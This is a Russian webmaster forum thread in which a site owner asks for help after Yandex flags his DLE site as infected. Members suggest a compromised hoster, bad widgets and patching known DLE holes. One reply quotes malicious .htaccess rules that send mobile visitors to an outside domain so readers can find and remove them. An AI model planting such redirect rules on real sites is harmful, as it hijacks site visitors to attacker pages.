X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Помогите найти вирус на сайте, Яндекс ругается
andronik
andronik
Topic Starter сообщение 29.8.2013, 21:54; Ответить: andronik
Сообщение #1


Участник
***

Группа: User
Сообщений: 203
Регистрация: 7.6.2011
Поблагодарили: 22 раза
Репутация:   6  


Ребят всем привет! Уже около месяца появляется табличка обнаружен вирус, а потом сама проходит... Я чистил как мог, наверно у меня в движке есть дырки я даже не знаю( Очень надоело! Вирус был найдет на главной страницы, вот сам сайт Тык , если можете посмотрите что не так!Может и дырки найдете, заранее спасибо. Или что посоветуете делать?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Aleksandrometr
Aleksandrometr
сообщение 29.8.2013, 22:17; Ответить: Aleksandrometr
Сообщение #2


I ♥ BassBoosted
*****

Группа: Active User
Сообщений: 544
Регистрация: 23.8.2012
Поблагодарили: 203 раза
Репутация:   77  


Напишите форумчанину Intersect.
Он борется и со своими вирусами, и с чужими, и Officialу помог вроде бы.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AmoSeo
AmoSeo
сообщение 29.8.2013, 22:30; Ответить: AmoSeo
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 523
Регистрация: 10.6.2011
Поблагодарили: 130 раз
Репутация:   22  


Сайт на дле, предположительно воспользовались злоумышленники уязвимостью и тронули только .htaccess
Открыть через нотепад файл .htaccess (который лежит в корне сайта) и удалитть вирусные строки.
Далее чтоб это не повторилось, пройтись по бактрекеру и пофиксить все ранее заявленые уязвимости _http://dle-news.ru/bags/
На днях одной мадам помог убрать вирус на dle
RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)
RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile}       !^$
RewriteCond %{HTTP_HOST}          !^m.
RewriteCond %{HTTP:Cookie}        !smredir=0(;|$)
RewriteRule ^ http://live-internet.ws/ [R,L]

п.с. код может иметь разный вид


--------------------
Предоставляю услуги: Content Downloader - настройка парсера для любого сайта. (опыт с 2011 г.)
Наполнение магазинов товарами: Opencart, SimplaCMS, Webasyst и т.д.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
andronik
andronik
Topic Starter сообщение 30.8.2013, 17:30; Ответить: andronik
Сообщение #4


Участник
***

Группа: User
Сообщений: 203
Регистрация: 7.6.2011
Поблагодарили: 22 раза
Репутация:   6  


Спасибо буду пробовать!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
volkovysk
volkovysk
сообщение 31.8.2013, 18:27; Ответить: volkovysk
Сообщение #5


Участник
***


Группа: User
Сообщений: 109
Регистрация: 16.1.2011
Поблагодарили: 13 раз
Репутация:   -4  


(пост за вчера)
andronik, у Вас на сайте периодически появляется скрытый фрейм с рекламой godaddy.com. Вредоностный поведенческий метод с помощью ЯваСкрипт. Вспоминайте какую тизерку или банерку может устанавливали на сайте, через них обычно такое.

(добавление сегодня)
andronik, короче одного хостера взломали и напхали хакеры на сайты код с рекламой godaddy.com . Если Вы на hostlife сидите, то ищите изменённые скрипты или лишние файлы.

Сообщение отредактировал volkovysk - 31.8.2013, 18:29


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AlekSZ
AlekSZ
сообщение 31.8.2013, 19:05; Ответить: AlekSZ
Сообщение #6


Частый гость
**

Группа: User
Сообщений: 61
Регистрация: 11.8.2013
Поблагодарили: 1 раз
Репутация:   -4  


А как вообще вирус может попасть на сайт в принципе?


--------------------
http://e-rentier.ru/ - живой блог о простых инвестициях
Легальная несложная партнерка - хорошая доходность
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rkostik
rkostik
сообщение 31.8.2013, 21:02; Ответить: rkostik
Сообщение #7


Участник
***

Группа: User
Сообщений: 119
Регистрация: 5.8.2013
Поблагодарили: 4 раза
Репутация:   0  


У меня яндекс был тоже вирусы на сайтах понаходил. Проблема была в виджете от "Одна кнопка" удалил их код и всё нормально стало. Попробуйте поудалять все лишнее


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 1.9.2013, 0:27; Ответить: Rampage
Сообщение #8


Участник
***

Группа: User
Сообщений: 239
Регистрация: 20.11.2010
Из: localhost
Поблагодарили: 67 раз
Репутация:   23  


обращайтесь помогу, ссылка на тему в подписи)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
andronik
andronik
Topic Starter сообщение 1.9.2013, 2:55; Ответить: andronik
Сообщение #9


Участник
***

Группа: User
Сообщений: 203
Регистрация: 7.6.2011
Поблагодарили: 22 раза
Репутация:   6  


volkovysk,А у вас откуда инфа? Я написал в ТП, вот что ответили!
Послушайте, не слушайте разный бред. Если бы нас взломали, сервер был бы немедленно отключён и была бы восстановлена резервная копия всего сервера. И все клиенты были бы предупреждены.

Сообщение отредактировал andronik - 1.9.2013, 3:09
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
volkovysk
volkovysk
сообщение 1.9.2013, 10:13; Ответить: volkovysk
Сообщение #10


Участник
***


Группа: User
Сообщений: 109
Регистрация: 16.1.2011
Поблагодарили: 13 раз
Репутация:   -4  


(andronik @ 1.9.2013, 1:55) *
Я написал в ТП, вот что ответили!

smile.gif Какой хостер признается, что его продырявили. И на критику они жутко болезненно реагируют, чуть ли не с матом.

(andronik @ 1.9.2013, 1:55) *
А у вас откуда инфа?

Знакомый хостится там. У него такие же симптомы вируса как у Вас и реклама скрытая такая же была, яндекс первый просёк и пометил сайт как заражённый. Знакомый засёк изменения в яваскрипт-файлах. Сам не менял, стал изучать логи. Потом куда-то стал ломиться с разборками. Говорит, выяснилось, что через хостера злоумышленники смогли покоцать файлы клиента.
Вообще, взлом хостинга довольно частое явление, особенно у хостеров-новичков и Гхостеров.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Мобильный «Яндекс.Диск» стал безлимитным
9 MissContent 1213 Вчера, 20:28
автор: galikfor
Открытая тема (нет новых ответов) SimplePay: Прием платежей на сайте для юридических и физических лиц
2 kuprum 339 Вчера, 15:50
автор: kuprum
Горячая тема (нет новых ответов) Рекомендую: размещение статьи на сайте, ТИЦ 325, PR 6, траст XT 8
44 rumblade 10647 Вчера, 15:45
автор: rumblade
Открытая тема (нет новых ответов) Тренд сайта по сравнению с аналогами, новый параметр в Яндекс Вебмастере
7 0alex1 1477 Вчера, 14:03
автор: coremission
Открытая тема (нет новых ответов) Стоит ли подавать платную заявку в Яндекс Каталог для регионального издания?
12 DVORYAN 1761 13.12.2017, 16:41
автор: vds4you


 



RSS Текстовая версия Сейчас: 15.12.2017, 3:13
Дизайн